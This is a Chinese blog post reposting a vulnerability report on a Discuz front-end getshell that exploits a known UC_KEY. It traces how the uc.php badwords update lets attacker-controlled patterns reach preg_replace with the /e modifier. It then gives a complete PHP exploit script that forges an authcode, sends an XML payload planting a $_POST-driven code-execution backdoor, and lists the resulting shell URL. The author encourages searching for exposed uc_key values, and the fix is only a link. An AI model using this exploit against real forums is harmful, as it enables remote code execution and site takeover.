Discuz利用UC_KEY进行前台getshell2


Jun 17 2016

Discuz利用UC_KEY进行前台getshell2

首页 » 漏洞收集 » Discuz利用UC_KEY进行前台getshell2   

 

简要描述:

http://drops.wooyun.org/papers/7830
其实这里已经说得比较明白了。
利用这个漏洞已经好些时候,包括之前腾讯的shell(http://www.wooyun.org/bugs/wooyun-2010-092923)
不过好像官方还是不太重视,特意再提一下,不用登陆后台,直接前台能利用(顺便打卡^-^)
乌云搜索uc_key会有很多惊喜哦。

详细说明:

\api\uc.php

function updatebadwords($get, $post) {



  global $_G;







  if(!API_UPDATEBADWORDS) {



   return API_RETURN_FORBIDDEN;



  }







  $data = array();



  if(is_array($post)) {



   foreach($post as $k => $v) {



    $data['findpattern'][$k] = $v['findpattern'];



    $data['replace'][$k] = $v['replacement'];



   }



  }



  $cachefile = DISCUZ_ROOT.'./uc_client/data/cache/badwords.php';



  $fp = fopen($cachefile, 'w');



  $s = "<?php\r\n";



  $s .= '$_CACHE[\'badwords\'] = '.var_export($data, TRUE).";\r\n";



  fwrite($fp, $s);



  fclose($fp);







  return API_RETURN_SUCCEED;



 }
更新 uc_client/data/cache/badwords.php

再看

\source\module\forum\forum_ajax.php
if($_GET['action'] == 'checkusername') {











 $username = trim($_GET['username']);



 $usernamelen = dstrlen($username);



 if($usernamelen < 3) {



  showmessage('profile_username_tooshort', '', array(), array('handle' => false));



 } elseif($usernamelen > 15) {



  showmessage('profile_username_toolong', '', array(), array('handle' => false));



 }







 loaducenter();



 $ucresult = uc_user_checkname($username);
跟踪 uc_user_checkname
function uc_user_checkname($username) {



 return call_user_func(UC_API_FUNC, 'user', 'check_username', array('username'=>$username));



}





define('UC_API_FUNC', UC_CONNECT == 'mysql' ? 'uc_api_mysql' : 'uc_api_post');
默认情况下

UC_API_FUNC为 uc_api_mysql
function uc_api_mysql($model, $action, $args=array()) {



 global $uc_controls;



 if(empty($uc_controls[$model])) {



  include_once UC_ROOT.'./lib/db.class.php';



  include_once UC_ROOT.'./model/base.php';



  include_once UC_ROOT."./control/$model.php";



  eval("\$uc_controls['$model'] = new {$model}control();");



 }



 if($action{0} != '_') {



  $args = uc_addslashes($args, 1, TRUE);



  $action = 'on'.$action;



  $uc_controls[$model]->input = $args;



  return $uc_controls[$model]->$action($args);



 } else {



  return '';



 }



}
继续跟综到
function check_usernamecensor($username) {



  $_CACHE['badwords'] = $this->base->cache('badwords');



  $censorusername = $this->base->get_setting('censorusername');



  $censorusername = $censorusername['censorusername'];



  $censorexp = '/^('.str_replace(array('\\*', "\r\n", ' '), array('.*', '|', ''), preg_quote(($censorusername = trim($censorusername)), '/')).')$/i';



  $usernamereplaced = isset($_CACHE['badwords']['findpattern']) && !empty($_CACHE['badwords']['findpattern']) ? @preg_replace($_CACHE['badwords']['findpattern'], $_CACHE['badwords']['replace'], $username) : $username;



  if(($usernamereplaced != $username) || ($censorusername && preg_match($censorexp, $username))) {



   return FALSE;



  } else {



   return TRUE;



  }



 }

注意到



@preg_replace($_CACHE['badwords']['findpattern'], $_CACHE['badwords']['replace'], $username)



两个参数都可控,即可造成命令执行。

漏洞证明:

利用脚本,3.2后要加上 formhash + cookie 绕过xss拦截

<?php



    $timestamp = time()+10*3600;



    $host="**.**.**.**";



    $agent= md5("Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0");



    $uc_key="uckey";



    $code=urlencode(_authcode("agent=$agent&time=$timestamp&action=updatebadwords", 'ENCODE', $uc_key));



   



    $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>



<root>



 <item id="0">



  <item id="findpattern">/admin/e</item>



  <item id="replacement">@preg_replace(chr(47).chr(47).chr(101),$_POST[c],chr(098));</item>



 </item>



</root>';











   /* $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?><root></root>'; */











    $html1 = send($cmd1);



    echo $html1;







    



    



function send($cmd){



    global $host,$code;



    $message = "POST /api/uc.php?code=".$code."  HTTP/1.1\r\n";



    $message .= "Accept: */*\r\n";



    $message .= "Referer: ".$host."\r\n";



    $message .= "Accept-Language: zh-cn\r\n";



    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";



    $message .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0\r\n";



    $message .= "Host: ".$host."\r\n";



    $message .= "Content-Length: ".strlen($cmd)."\r\n";



    $message .= "Connection: Close\r\n\r\n";



    $message .= $cmd;



    



    $fp = fsockopen($host, 80);



    fputs($fp, $message);



    



    $resp = '';







    while ($fp && !feof($fp))



        $resp .= fread($fp, 1024);



    



    return $resp;



}







function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {



    $ckey_length = 4;







    $key = md5($key ? $key : UC_KEY);



    $keya = md5(substr($key, 0, 16));



    $keyb = md5(substr($key, 16, 16));



    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';







    $cryptkey = $keya.md5($keya.$keyc);



    $key_length = strlen($cryptkey);







    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;



    $string_length = strlen($string);







    $result = '';



    $box = range(0, 255);







    $rndkey = array();



    for($i = 0; $i <= 255; $i++) {



        $rndkey[$i] = ord($cryptkey[$i % $key_length]);



    }







    for($j = $i = 0; $i < 256; $i++) {



        $j = ($j + $box[$i] + $rndkey[$i]) % 256;



        $tmp = $box[$i];



        $box[$i] = $box[$j];



        $box[$j] = $tmp;



    }







    for($a = $j = $i = 0; $i < $string_length; $i++) {



        $a = ($a + 1) % 256;



        $j = ($j + $box[$a]) % 256;



        $tmp = $box[$a];



        $box[$a] = $box[$j];



        $box[$j] = $tmp;



        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));



    }







    if($operation == 'DECODE') {



        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {



            return substr($result, 26);



        } else {



                return '';



            }



    } else {



        return $keyc.str_replace('=', '', base64_encode($result));



    }







}



?>

 

提交后,shell地址为:



**.**.**.**/forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin 

修复方案:

http://**.**.**.**/papers/7830 里说得很清楚了。

 

正文部分到此结束

文章标签: Discuz漏洞 Discuzgetshell

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «burpsuite 1.7.03最新破解版 | discuz某插件设计缺陷可前台getshell(有较强条件限制)»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

已有2条评论

匿名

2016-09-05 22:10 沙发
看不懂啊看不懂~
学C的路过

mOon

2016-09-07 19:44
@匿名:简单噢